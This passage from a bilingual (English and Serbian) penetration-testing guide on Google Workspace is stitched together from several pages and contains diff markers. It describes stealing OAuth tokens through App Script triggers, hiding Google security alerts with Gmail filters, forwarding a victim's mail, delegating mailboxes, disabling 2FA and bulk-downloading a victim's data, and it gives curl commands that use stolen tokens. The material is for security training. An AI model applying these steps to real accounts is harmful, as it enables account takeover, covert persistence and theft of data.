If the user copies it an access it both the **contents of the document and the App Scripts will be copied**, however the **triggers are not**, therefore **nothing will be executed**.
Ako korisnik to kopira i pristupi mu, i **sadržaj dokumenta i App Scripts će biti kopirani**, međutim **okidači nisu**, stoga **ništa neće biti izvršeno**.
### Sharing as Web Application
Note that it's also possible to **share an App Script as a Web application** (in the Editor of the App Script, deploy as a Web application), but an alert such as this one will appear:
Napomena: takođe je moguće **podeliti App Script kao Web aplikaciju** (u Editoru App Script-a, implementirati kao Web aplikaciju), ali će se pojaviti upozorenje poput ovog:
<figure><img src="../../../images/image (337).png" alt=""><figcaption></figcaption></figure>
Followed by the **typical OAuth prompt asking** for the needed permissions.
Praćeno **tipičnim OAuth promptom koji traži** potrebne dozvole.
### Testing
You can test a gathered token to list emails with:
Možete testirati prikupljeni token za listanje emailova sa:
```bash
curl -X GET "https://www.googleapis.com/gmail/v1/users/<user@email>/messages" \
-H "Authorization: Bearer <token>"
```
List calendar of the user:
Lista kalendara korisnika:
```bash
curl -H "Authorization: Bearer $OAUTH_TOKEN" \
-H "Accept: application/json" \
"https://www.googleapis.com/calendar/v3/users/me/calendarList"
-H "Accept: application/json" \
"https://www.googleapis.com/calendar/v3/users/me/calendarList"
```
## App Script kao Persistencija
## App Script as Persistence
Jedna opcija za persistenciju bi bila da **napravite dokument i dodate okidač za funkciju getToken** i podelite dokument sa napadačem tako da svaki put kada napadač otvori datoteku, on **izvlači token žrtve.**
One option for persistence would be to **create a document and add a trigger for the the getToken** function and share the document with the attacker so every-time the attacker opens the file he **exfiltrates the token of the victim.**
Takođe je moguće napraviti App Script i postaviti ga da se aktivira svakih X vremena (kao svake minute, sata, dana...). Napadač koji je **kompromitovao akreditive ili sesiju žrtve mogao bi postaviti vremenski okidač za App Script i svaki dan** da izlaže veoma privilegovan OAuth token:
It's also possible to create an App Script and make it trigger every X time (like every minute, hour, day...). An attacker that has **compromised credentials or a session of a victim could set an App Script time trigger and leak a very privileged OAuth token every day**:
Just create an App Script, go to Triggers, click on Add Trigger, and select as event source Time-driven and select the options that better suits you:
Jednostavno napravite App Script, idite na Okidače, kliknite na Dodaj Okidač, i izaberite kao izvor događaja Vremenski okidač i izaberite opcije koje vam najbolje odgovaraju:
<figure><img src="../../../images/image (336).png" alt=""><figcaption></figcaption></figure>
> [!CAUTION]
> This will create a security alert email and a push message to your mobile alerting about this.
> Ovo će kreirati email obaveštenje o bezbednosti i push poruku na vaš mobilni uređaj koja vas obaveštava o tome.
### Shared Document Unverified Prompt Bypass
### Zaobilaženje Nepoverljivog Upita za Deljeni Dokument
Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**.
Štaviše, ako vam je neko **podelio** dokument sa **pristupom za uređivanje**, možete generisati **App Scripts unutar dokumenta** i **VLASNIK (kreator) dokumenta će biti vlasnik App Script-a**.
> [!WARNING]
> This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it.
> To znači da će **kreator dokumenta izgledati kao kreator bilo kog App Script-a** koji bilo ko sa pristupom za uređivanje kreira unutar njega.
>
> This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document.
> To takođe znači da će **App Script biti poveren od strane Workspace okruženja** kreatora dokumenta.
> [!CAUTION]
> This also means that if an **App Script already existed** and people have **granted access**, anyone with **Editor** permission on the doc can **modify it and abuse that access.**\
> To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `<img>` tags).
> To takođe znači da ako je **App Script već postojao** i ljudi su **dali pristup**, bilo ko sa **Editor** dozvolom na dokumentu može **modifikovati i zloupotrebiti taj pristup.**\
> Da biste zloupotrebili ovo, takođe vam je potrebno da ljudi aktiviraju App Script. A jedan zgodan trik je da **objavite skriptu kao web aplikaciju**. Kada **ljudi** koji su već dali **pristup** App Script-u pristupe web stranici, oni će **aktivirati App Script** (ovo takođe funkcioniše koristeći `<img>` tagove).
{{#include ../../../banners/hacktricks-training.md}}
@@ -3,184 +3,180 @@
{{#include ../../banners/hacktricks-training.md}}
> [!CAUTION]
> All the actions mentioned in this section that change setting will generate a **security alert to the email and even a push notification to any mobile synced** with the account.
> Sve akcije navedene u ovom odeljku koje menjaju postavke generisaće **bezbednosno obaveštenje na email i čak push obaveštenje na bilo koji mobilni uređaj sinhronizovan** sa nalogom.
## **Persistence in Gmail**
## **Persistencija u Gmail-u**
- You can create **filters to hide** security notifications from Google
- `from: (no-reply@accounts.google.com) "Security Alert"`
- This will prevent security emails to reach the email (but won't prevent push notifications to the mobile)
- Možete kreirati **filtre za sakrivanje** bezbednosnih obaveštenja od Google-a
- `from: (no-reply@accounts.google.com) "Security Alert"`
- Ovo će sprečiti da bezbednosni emailovi stignu na email (ali neće sprečiti push obaveštenja na mobilni)
<details>
<summary>Steps to create a gmail filter</summary>
<summary>Koraci za kreiranje gmail filtera</summary>
(Instructions from [**here**](https://support.google.com/mail/answer/6579))
(Uputstva [**ovde**](https://support.google.com/mail/answer/6579))
1. Open [Gmail](https://mail.google.com/).
2. In the search box at the top, click Show search options ![photos tune](https://lh3.googleusercontent.com/cD6YR_YvqXqNKxrWn2NAWkV6tjJtg8vfvqijKT1_9zVCrl2sAx9jROKhLqiHo2ZDYTE=w36) .
3. Enter your search criteria. If you want to check that your search worked correctly, see what emails show up by clicking **Search**.
4. At the bottom of the search window, click **Create filter**.
5. Choose what youd like the filter to do.
6. Click **Create filter**.
1. Otvorite [Gmail](https://mail.google.com/).
2. U pretraživaču na vrhu, kliknite na Prikaži opcije pretrage ![photos tune](https://lh3.googleusercontent.com/cD6YR_YvqXqNKxrWn2NAWkV6tjJtg8vfvqijKT1_9zVCrl2sAx9jROKhLqiHo2ZDYTE=w36).
3. Unesite svoje kriterijume pretrage. Ako želite da proverite da li je vaša pretraga ispravno funkcionisala, pogledajte koji emailovi se pojavljuju klikom na **Pretraži**.
4. Na dnu prozora pretrage, kliknite na **Kreiraj filter**.
5. Izaberite šta želite da filter radi.
6. Kliknite na **Kreiraj filter**.
Check your current filter (to delete them) in [https://mail.google.com/mail/u/0/#settings/filters](https://mail.google.com/mail/u/0/#settings/filters)
Proverite svoj trenutni filter (da ih obrišete) na [https://mail.google.com/mail/u/0/#settings/filters](https://mail.google.com/mail/u/0/#settings/filters)
</details>
<figure><img src="../../images/image (331).png" alt=""><figcaption></figcaption></figure>
- Create **forwarding address to forward sensitive information** (or everything) - You need manual access.
- Create a forwarding address in [https://mail.google.com/mail/u/2/#settings/fwdandpop](https://mail.google.com/mail/u/2/#settings/fwdandpop)
- The receiving address will need to confirm this
- Then, set to forward all the emails while keeping a copy (remember to click on save changes):
- Kreirajte **adresu za prosleđivanje za prosleđivanje osetljivih informacija** (ili svega) - Potrebno je ručno pristup.
- Kreirajte adresu za prosleđivanje na [https://mail.google.com/mail/u/2/#settings/fwdandpop](https://mail.google.com/mail/u/2/#settings/fwdandpop)
- Primalac će morati da potvrdi ovo
- Zatim, postavite da prosledite sve emailove dok zadržavate kopiju (zapamtite da kliknete na sačuvaj promene):
<figure><img src="../../images/image (332).png" alt=""><figcaption></figcaption></figure>
It's also possible create filters and forward only specific emails to the other email address.
Takođe je moguće kreirati filtre i proslediti samo određene emailove na drugu email adresu.
## App passwords
## App lozinke
If you managed to **compromise a google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) (follow the link to see the steps). Note that **App passwords are no longer recommended by Google and are revoked** when the user **changes his Google Account password.**
Ako ste uspeli da **kompromitujete sesiju google korisnika** i korisnik je imao **2FA**, možete **generisati** [**app lozinku**](https://support.google.com/accounts/answer/185833?hl=en) (pratite link da vidite korake). Imajte na umu da **App lozinke više nisu preporučene od strane Google-a i biće opozvane** kada korisnik **promeni lozinku svog Google naloga.**
**Even if you have an open session you will need to know the password of the user to create an app password.**
**Čak i ako imate otvorenu sesiju, moraćete da znate lozinku korisnika da biste kreirali app lozinku.**
> [!NOTE]
> App passwords can **only be used with accounts that have 2-Step Verification** turned on.
> App lozinke se **mogu koristiti samo sa nalozima koji imaju uključenu 2-Step Verification.**
## Change 2-FA and similar
## Promena 2-FA i slično
It's also possible to **turn off 2-FA or to enrol a new device** (or phone number) in this page [**https://myaccount.google.com/security**](https://myaccount.google.com/security)**.**\
**It's also possible to generate passkeys (add your own device), change the password, add mobile numbers for verification phones and recovery, change the recovery email and change the security questions).**
Takođe je moguće **isključiti 2-FA ili registrovati novi uređaj** (ili broj telefona) na ovoj stranici [**https://myaccount.google.com/security**](https://myaccount.google.com/security)**.**\
**Takođe je moguće generisati ključeve (dodati svoj uređaj), promeniti lozinku, dodati mobilne brojeve za verifikacione telefone i oporavak, promeniti email za oporavak i promeniti bezbednosna pitanja).**
> [!CAUTION]
> To **prevent security push notifications** to reach the phone of the user, you could **sign his smartphone out** (although that would be weird) because you cannot sign him in again from here.
> Da biste **sprečili bezbednosne push obaveštenja** da stignu na telefon korisnika, mogli biste **izlogovati njegov pametan telefon** (iako bi to bilo čudno) jer ne možete ponovo da ga prijavite odavde.
>
> It's also possible to **locate the device.**
> Takođe je moguće **locirati uređaj.**
**Even if you have an open session you will need to know the password of the user to change these settings.**
**Čak i ako imate otvorenu sesiju, moraćete da znate lozinku korisnika da biste promenili ove postavke.**
## Persistence via OAuth Apps
## Persistencija putem OAuth aplikacija
If you have **compromised the account of a user,** you can just **accept** to grant all the possible permissions to an **OAuth App**. The only problem is that Workspace can be configure to **disallow unreviewed external and/or internal OAuth apps.**\
It is pretty common for Workspace Organizations to not trust by default external OAuth apps but trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**.
Ako ste **kompromitovali nalog korisnika**, možete jednostavno **prihvatiti** da dodelite sve moguće dozvole **OAuth aplikaciji**. Jedini problem je što Workspace može biti podešen da **onemogući neproverene spoljne i/ili interne OAuth aplikacije.**\
Prilično je uobičajeno da Workspace organizacije po defaultu ne veruju spoljnim OAuth aplikacijama, ali veruju internim, tako da ako imate **dovoljno dozvola da generišete novu OAuth aplikaciju** unutar organizacije i spoljne aplikacije su onemogućene, generišite je i **koristite tu novu internu OAuth aplikaciju da održite persistenciju**.
Check the following page for more information about OAuth Apps:
Proverite sledeću stranicu za više informacija o OAuth aplikacijama:
{{#ref}}
gws-google-platforms-phishing/
{{#endref}}
## Persistence via delegation
## Persistencija putem delegacije
You can just **delegate the account** to a different account controlled by the attacker (if you are allowed to do this). In Workspace **Organizations** this option must be **enabled**. It can be disabled for everyone, enabled from some users/groups or for everyone (usually it's only enabled for some users/groups or completely disabled).
Možete jednostavno **delegirati nalog** na drugi nalog koji kontroliše napadač (ako vam je to dozvoljeno). U Workspace **organizacijama** ova opcija mora biti **omogućena**. Može biti onemogućena za sve, omogućena za neke korisnike/grupe ili za sve (obično je omogućena samo za neke korisnike/grupe ili potpuno onemogućena).
<details>
<summary>If you are a Workspace admin check this to enable the feature</summary>
<summary>Ako ste Workspace administrator, proverite ovo da omogućite funkciju</summary>
(Information [copied form the docs](https://support.google.com/a/answer/7223765))
(Informacije [kopirane iz dokumenata](https://support.google.com/a/answer/7223765))
As an administrator for your organization (for example, your work or school), you control whether users can delegate access to their Gmail account. You can let everyone have the option to delegate their account. Or, only let people in certain departments set up delegation. For example, you can:
Kao administrator vaše organizacije (na primer, vašeg posla ili škole), kontrolišete da li korisnici mogu delegirati pristup svom Gmail nalogu. Možete dozvoliti svima da imaju opciju da delegiraju svoj nalog. Ili, samo dozvoliti ljudima u određenim odeljenjima da postave delegaciju. Na primer, možete:
- Add an administrative assistant as a delegate on your Gmail account so they can read and send email on your behalf.
- Add a group, such as your sales department, in Groups as a delegate to give everyone access to one Gmail account.
- Dodati administrativnog asistenta kao delegata na vašem Gmail nalogu kako bi mogli da čitaju i šalju email u vaše ime.
- Dodati grupu, kao što je vaše prodajno odeljenje, u Grupe kao delegata da svima omogući pristup jednom Gmail nalogu.
Users can only delegate access to another user in the same organization, regardless of their domain or their organizational unit.
Korisnici mogu delegirati pristup samo drugom korisniku u istoj organizaciji, bez obzira na njihovu domenu ili organizacionu jedinicu.
#### Delegation limits & restrictions
#### Ograničenja i restrikcije delegacije
- **Allow users to grant their mailbox access to a Google group** option: To use this option, it must be enabled for the OU of the delegated account and for each group member's OU. Group members that belong to an OU without this option enabled can't access the delegated account.
- With typical use, 40 delegated users can access a Gmail account at the same time. Above-average use by one or more delegates might reduce this number.
- Automated processes that frequently access Gmail might also reduce the number of delegates who can access an account at the same time. These processes include APIs or browser extensions that access Gmail frequently.
- A single Gmail account supports up to 1,000 unique delegates. A group in Groups counts as one delegate toward the limit.
- Delegation does not increase the limits for a Gmail account. Gmail accounts with delegated users have the standard Gmail account limits and policies. For details, visit [Gmail limits and policies](https://support.google.com/a/topic/28609).
- **Dozvolite korisnicima da dodele pristup svojoj pošti Google grupi** opcija: Da biste koristili ovu opciju, mora biti omogućena za OU delegiranog naloga i za OU svakog člana grupe. Članovi grupe koji pripadaju OU bez ove opcije omogućene ne mogu pristupiti delegiranom nalogu.
- Sa tipičnom upotrebom, 40 delegiranih korisnika može pristupiti Gmail nalogu u isto vreme. Iznadprosečna upotreba od strane jednog ili više delegata može smanjiti ovaj broj.
- Automatizovani procesi koji često pristupaju Gmail-u takođe mogu smanjiti broj delegata koji mogu pristupiti nalogu u isto vreme. Ovi procesi uključuju API-je ili ekstenzije pretraživača koje često pristupaju Gmail-u.
- Jedan Gmail nalog podržava do 1,000 jedinstvenih delegata. Grupa u Grupama se računa kao jedan delegat prema limitu.
- Delegacija ne povećava limite za Gmail nalog. Gmail nalozi sa delegiranim korisnicima imaju standardne limite i politike Gmail naloga. Za detalje, posetite [Gmail limite i politike](https://support.google.com/a/topic/28609).
#### Step 1: Turn on Gmail delegation for your users
#### Korak 1: Uključite Gmail delegaciju za svoje korisnike
**Before you begin:** To apply the setting for certain users, put their accounts in an [organizational unit](https://support.google.com/a/topic/1227584).
**Pre nego što počnete:** Da biste primenili postavku za određene korisnike, stavite njihove naloge u [organizacionu jedinicu](https://support.google.com/a/topic/1227584).
1. [Sign in](https://admin.google.com/) to your [Google Admin console](https://support.google.com/a/answer/182076).
1. [Prijavite se](https://admin.google.com/) na vašu [Google Admin konzolu](https://support.google.com/a/answer/182076).
Sign in using an _administrator account_, not your current account CarlosPolop@gmail.com
Prijavite se koristeći _administratorski nalog_, a ne vaš trenutni nalog CarlosPolop@gmail.com
2. In the Admin console, go to Menu ![](https://storage.googleapis.com/support-kms-prod/JxKYG9DqcsormHflJJ8Z8bHuyVI5YheC0lAp)![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)![](https://storage.googleapis.com/support-kms-prod/ocGtUSENh4QebLpvZcmLcNRZyaTBcolMRSyl) **Apps**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Google Workspace**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gmail**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**User settings**.
3. To apply the setting to everyone, leave the top organizational unit selected. Otherwise, select a child [organizational unit](https://support.google.com/a/topic/1227584).
4. Click **Mail delegation**.
5. Check the **Let users delegate access to their mailbox to other users in the domain** box.
6. (Optional) To let users specify what sender information is included in delegated messages sent from their account, check the **Allow users to customize this setting** box.
7. Select an option for the default sender information that's included in messages sent by delegates:
- **Show the account owner and the delegate who sent the email**—Messages include the email addresses of the Gmail account owner and the delegate.
- **Show the account owner only**—Messages include the email address of only the Gmail account owner. The delegate email address is not included.
8. (Optional) To let users add a group in Groups as a delegate, check the **Allow users to grant their mailbox access to a Google group** box.
9. Click **Save**. If you configured a child organizational unit, you might be able to **Inherit** or **Override** a parent organizational unit's settings.
10. (Optional) To turn on Gmail delegation for other organizational units, repeat steps 39.
2. U Admin konzoli, idite na Meni ![](https://storage.googleapis.com/support-kms-prod/JxKYG9DqcsormHflJJ8Z8bHuyVI5YheC0lAp)![i zatim](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)![](https://storage.googleapis.com/support-kms-prod/ocGtUSENh4QebLpvZcmLcNRZyaTBcolMRSyl) **Aplikacije**![i zatim](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Google Workspace**![i zatim](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gmail**![i zatim](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Podešavanja korisnika**.
3. Da biste primenili postavku za sve, ostavite izabranu gornju organizacionu jedinicu. Inače, izaberite pod [organizacionu jedinicu](https://support.google.com/a/topic/1227584).
4. Kliknite na **Delegacija pošte**.
5. Proverite **Dozvolite korisnicima da delegiraju pristup svojoj pošti drugim korisnicima u domenu** okvir.
6. (Opcionalno) Da biste omogućili korisnicima da odrede koje informacije o pošiljaocu su uključene u delegirane poruke poslate sa njihovog naloga, proverite **Dozvolite korisnicima da prilagode ovu postavku** okvir.
7. Izaberite opciju za podrazumevane informacije o pošiljaocu koje su uključene u poruke koje šalju delegati:
- **Prikaži vlasnika naloga i delegata koji je poslao email**—Poruke uključuju email adrese vlasnika Gmail naloga i delegata.
- **Prikaži samo vlasnika naloga**—Poruke uključuju email adresu samo vlasnika Gmail naloga. Email adresa delegata nije uključena.
8. (Opcionalno) Da biste omogućili korisnicima da dodaju grupu u Grupama kao delegata, proverite **Dozvolite korisnicima da dodele pristup svojoj pošti Google grupi** okvir.
9. Kliknite na **Sačuvaj**. Ako ste konfigurisali pod organizacionu jedinicu, možda ćete moći da **Nasledite** ili **Zamenite** postavke roditeljske organizacione jedinice.
10. (Opcionalno) Da biste uključili Gmail delegaciju za druge organizacione jedinice, ponovite korake 39.
Changes can take up to 24 hours but typically happen more quickly. [Learn more](https://support.google.com/a/answer/7514107)
Promene mogu potrajati do 24 sata, ali obično se dešavaju brže. [Saznajte više](https://support.google.com/a/answer/7514107)
#### Step 2: Have users set up delegates for their accounts
#### Korak 2: Neka korisnici postave delegate za svoje naloge
After you turn on delegation, your users go to their Gmail settings to assign delegates. Delegates can then read, send, and receive messages on behalf of the user.
Nakon što uključite delegaciju, vaši korisnici idu na svoja Gmail podešavanja da dodele delegate. Delegati tada mogu čitati, slati i primati poruke u ime korisnika.
For details, direct users to [Delegate and collaborate on email](https://support.google.com/a/users/answer/138350).
Za detalje, uputite korisnike na [Delegirajte i sarađujte na email-u](https://support.google.com/a/users/answer/138350).
</details>
<details>
<summary>From a regular suer, check here the instructions to try to delegate your access</summary>
<summary>Od običnog korisnika, proverite ovde uputstva da pokušate da delegirate svoj pristup</summary>
(Info copied [**from the docs**](https://support.google.com/mail/answer/138350))
(Info kopirana [**iz dokumenata**](https://support.google.com/mail/answer/138350))
You can add up to 10 delegates.
Možete dodati do 10 delegata.
If you're using Gmail through your work, school, or other organization:
Ako koristite Gmail preko svog posla, škole ili druge organizacije:
- You can add up to 1000 delegates within your organization.
- With typical use, 40 delegates can access a Gmail account at the same time.
- If you use automated processes, such as APIs or browser extensions, a few delegates can access a Gmail account at the same time.
- Možete dodati do 1000 delegata unutar vaše organizacije.
- Sa tipičnom upotrebom, 40 delegata može pristupiti Gmail nalogu u isto vreme.
- Ako koristite automatizovane procese, kao što su API-ji ili ekstenzije pretraživača, nekoliko delegata može pristupiti Gmail nalogu u isto vreme.
1. On your computer, open [Gmail](https://mail.google.com/). You can't add delegates from the Gmail app.
2. In the top right, click Settings ![Settings](https://lh3.googleusercontent.com/p3J-ZSPOLtuBBR_ofWTFDfdgAYQgi8mR5c76ie8XQ2wjegk7-yyU5zdRVHKybQgUlQ=w36-h36) ![and then](https://lh3.googleusercontent.com/3_l97rr0GvhSP2XV5OoCkV2ZDTIisAOczrSdzNCBxhIKWrjXjHucxNwocghoUa39gw=w36-h36) **See all settings**.
3. Click the **Accounts and Import** or **Accounts** tab.
4. In the "Grant access to your account" section, click **Add another account**. If youre using Gmail through your work or school, your organization may restrict email delegation. If you dont see this setting, contact your admin.
- If you don't see Grant access to your account, then it's restricted.
5. Enter the email address of the person you want to add. If youre using Gmail through your work, school, or other organization, and your admin allows it, you can enter the email address of a group. This group must have the same domain as your organization. External members of the group are denied delegation access.\
\
**Important:** If the account you delegate is a new account or the password was reset, the Admin must turn off the requirement to change password when you first sign in.
1. Na svom računaru, otvorite [Gmail](https://mail.google.com/). Ne možete dodati delegate iz Gmail aplikacije.
2. U gornjem desnom uglu, kliknite na Podešavanja ![Settings](https://lh3.googleusercontent.com/p3J-ZSPOLtuBBR_ofWTFDfdgAYQgi8mR5c76ie8XQ2wjegk7-yyU5zdRVHKybQgUlQ=w36-h36) ![i zatim](https://lh3.googleusercontent.com/3_l97rr0GvhSP2XV5OoCkV2ZDTIisAOczrSdzNCBxhIKWrjXjHucxNwocghoUa39gw=w36-h36) **Pogledajte sve postavke**.
3. Kliknite na **Nalozi i uvoz** ili **Nalozi** tab.
4. U sekciji "Dodeli pristup svom nalogu", kliknite na **Dodaj drugi nalog**. Ako koristite Gmail preko svog posla ili škole, vaša organizacija može ograničiti delegaciju email-a. Ako ne vidite ovu postavku, kontaktirajte svog administratora.
- Ako ne vidite Dodeli pristup svom nalogu, onda je to ograničeno.
5. Unesite email adresu osobe koju želite da dodate. Ako koristite Gmail preko svog posla, škole ili druge organizacije, i vaš administrator to dozvoljava, možete uneti email adresu grupe. Ova grupa mora imati istu domenu kao vaša organizacija. Spoljni članovi grupe su odbijeni pristup delegaciji.\
\
**Važno:** Ako je nalog koji delegirate novi nalog ili je lozinka resetovana, administrator mora isključiti zahtev za promenu lozinke kada se prvi put prijavite.
- [Learn how an Admin can create a user](https://support.google.com/a/answer/33310).
- [Learn how an Admin can reset passwords](https://support.google.com/a/answer/33319).
- [Saznajte kako administrator može kreirati korisnika](https://support.google.com/a/answer/33310).
- [Saznajte kako administrator može resetovati lozinke](https://support.google.com/a/answer/33319).
6\. Click **Next Step** ![and then](https://lh3.googleusercontent.com/QbWcYKta5vh_4-OgUeFmK-JOB0YgLLoGh69P478nE6mKdfpWQniiBabjF7FVoCVXI0g=h36) **Send email to grant access**.
6. Kliknite na **Sledeći korak** ![i zatim](https://lh3.googleusercontent.com/QbWcYKta5vh_4-OgUeFmK-JOB0YgLLoGh69P478nE6mKdfpWQniiBabjF7FVoCVXI0g=h36) **Pošaljite email da dodelite pristup**.
The person you added will get an email asking them to confirm. The invitation expires after a week.
Osoba koju ste dodali će dobiti email u kojem se traži da potvrdi. Poziv važi nedelju dana.
If you added a group, all group members will become delegates without having to confirm.
Ako ste dodali grupu, svi članovi grupe će postati delegati bez potrebe za potvrdom.
Note: It may take up to 24 hours for the delegation to start taking effect.
Napomena: Može potrajati do 24 sata da delegacija počne da deluje.
</details>
## Persistence via Android App
## Persistencija putem Android aplikacije
If you have a **session inside victims google account** you can browse to the **Play Store** and might be able to **install malware** you have already uploaded to the store directly **to the phone** to maintain persistence and access the victims phone.
Ako imate **sesiju unutar google naloga žrtve**, možete pretraživati **Play Store** i možda ćete moći da **instalirate malver** koji ste već otpremili u prodavnicu direktno **na telefon** da biste održali persistenciju i pristupili telefonu žrtve.
## **Persistence via** App Scripts
## **Persistencija putem** App skripti
You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**. For more information about how to do this check:
Možete kreirati **okidače zasnovane na vremenu** u App skriptama, tako da ako je App skripta prihvaćena od strane korisnika, biće **okidana** čak i **bez pristupa korisnika**. Za više informacija o tome kako to učiniti, proverite:
{{#ref}}
gws-google-platforms-phishing/gws-app-scripts.md
{{#endref}}
## References
## Reference
- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch i Beau Bullock - OK Google, Kako da Red Team GSuite?
{{#include ../../banners/hacktricks-training.md}}
@@ -4,14 +4,14 @@
## Google Groups Privesc
By default in workspace a **group** can be **freely accessed** by any member of the organization.\
Workspace also allow to **grant permission to groups** (even GCP permissions), so if groups can be joined and they have extra permissions, an attacker may **abuse that path to escalate privileges**.
Po defaultu, u workspace-u, **grupa** može biti **slobodno dostupna** bilo kojem članu organizacije.\
Workspace takođe omogućava **dodeljivanje dozvola grupama** (čak i GCP dozvola), tako da ako se grupe mogu pridružiti i imaju dodatne dozvole, napadač može **iskoristiti tu putanju za eskalaciju privilegija**.
You potentially need access to the console to join groups that allow to be joined by anyone in the org. Check groups information in [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups).
Potrebno je da imate pristup konzoli da biste se pridružili grupama koje dozvoljavaju pridruživanje bilo kome u organizaciji. Proverite informacije o grupama na [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups).
### Access Groups Mail info
If you managed to **compromise a google user session**, from [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) you can see the history of mails sent to the mail groups the user is member of, and you might find **credentials** or other **sensitive data**.
Ako ste uspeli da **kompromitujete sesiju google korisnika**, sa [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) možete videti istoriju mejlova poslatih grupama na koje je korisnik član, i možda ćete pronaći **akreditive** ili druge **osetljive podatke**.
## GCP <--> GWS Pivoting
@@ -19,52 +19,52 @@ If you managed to **compromise a google user session**, from [**https://groups.g
../gcp-security/gcp-to-workspace-pivoting/
{{#endref}}
## Takeout - Download Everything Google Knows about an account
## Takeout - Preuzmi sve što Google zna o nalogu
If you have a **session inside victims google account** you can download everything Google saves about that account from [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none)
Ako imate **sesiju unutar google naloga žrtve**, možete preuzeti sve što Google čuva o tom nalogu sa [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none)
## Vault - Download all the Workspace data of users
## Vault - Preuzmi sve podatke Workspace-a korisnika
If an organization has **Google Vault enabled**, you might be able to access [**https://vault.google.com**](https://vault.google.com/u/1/) and **download** all the **information**.
Ako organizacija ima **Google Vault omogućen**, možda ćete moći da pristupite [**https://vault.google.com**](https://vault.google.com/u/1/) i **preuzmete** sve **informacije**.
## Contacts download
## Preuzimanje kontakata
From [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es&tab=mC) you can download all the **contacts** of the user.
Sa [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es&tab=mC) možete preuzeti sve **kontakte** korisnika.
## Cloudsearch
In [**https://cloudsearch.google.com/**](https://cloudsearch.google.com) you can just search **through all the Workspace content** (email, drive, sites...) a user has access to. Ideal to **quickly find sensitive information**.
Na [**https://cloudsearch.google.com/**](https://cloudsearch.google.com) možete jednostavno pretraživati **sadržaj Workspace-a** (email, drive, sajtove...) kojem korisnik ima pristup. Idealno za **brzo pronalaženje osetljivih informacija**.
## Google Chat
In [**https://mail.google.com/chat**](https://mail.google.com/chat) you can access a Google **Chat**, and you might find sensitive information in the conversations (if any).
Na [**https://mail.google.com/chat**](https://mail.google.com/chat) možete pristupiti Google **Chat-u**, i možda ćete pronaći osetljive informacije u razgovorima (ako ih ima).
## Google Drive Mining
When **sharing** a document you can **specify** the **people** that can access it one by one, **share** it with your **entire company** (**or** with some specific **groups**) by **generating a link**.
Kada **delite** dokument, možete **navesti** **ljude** koji mogu da mu pristupe jedan po jedan, **podeliti** ga sa vašom **celom kompanijom** (**ili** sa nekim specifičnim **grupama**) generisanjem linka.
When sharing a document, in the advance setting you can also **allow people to search** for this file (by **default** this is **disabled**). However, it's important to note that once users views a document, it's searchable by them.
Kada delite dokument, u naprednim podešavanjima takođe možete **dozvoliti ljudima da pretražuju** ovaj fajl (po **defaultu** je **onemogućeno**). Međutim, važno je napomenuti da kada korisnici pogledaju dokument, on postaje pretražljiv za njih.
For sake of simplicity, most of the people will generate and share a link instead of adding the people that can access the document one by one.
Radi jednostavnosti, većina ljudi će generisati i deliti link umesto da dodaju ljude koji mogu da pristupe dokumentu jedan po jedan.
Some proposed ways to find all the documents:
Neki predloženi načini za pronalaženje svih dokumenata:
- Search in internal chat, forums...
- **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser)
- Pretražujte u internom chatu, forumima...
- **Spider** poznate **dokumente** tražeći **reference** na druge dokumente. To možete uraditi unutar App Script-a sa [**PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser)
## **Keep Notes**
In [**https://keep.google.com/**](https://keep.google.com) you can access the notes of the user, **sensitive** **information** might be saved in here.
Na [**https://keep.google.com/**](https://keep.google.com) možete pristupiti beleškama korisnika, **osetljive** **informacije** mogu biti sačuvane ovde.
### Modify App Scripts
In [**https://script.google.com/**](https://script.google.com/) you can find the APP Scripts of the user.
Na [**https://script.google.com/**](https://script.google.com/) možete pronaći APP Scripts korisnika.
## **Administrate Workspace**
In [**https://admin.google.com**/](https://admin.google.com), you might be able to modify the Workspace settings of the whole organization if you have enough permissions.
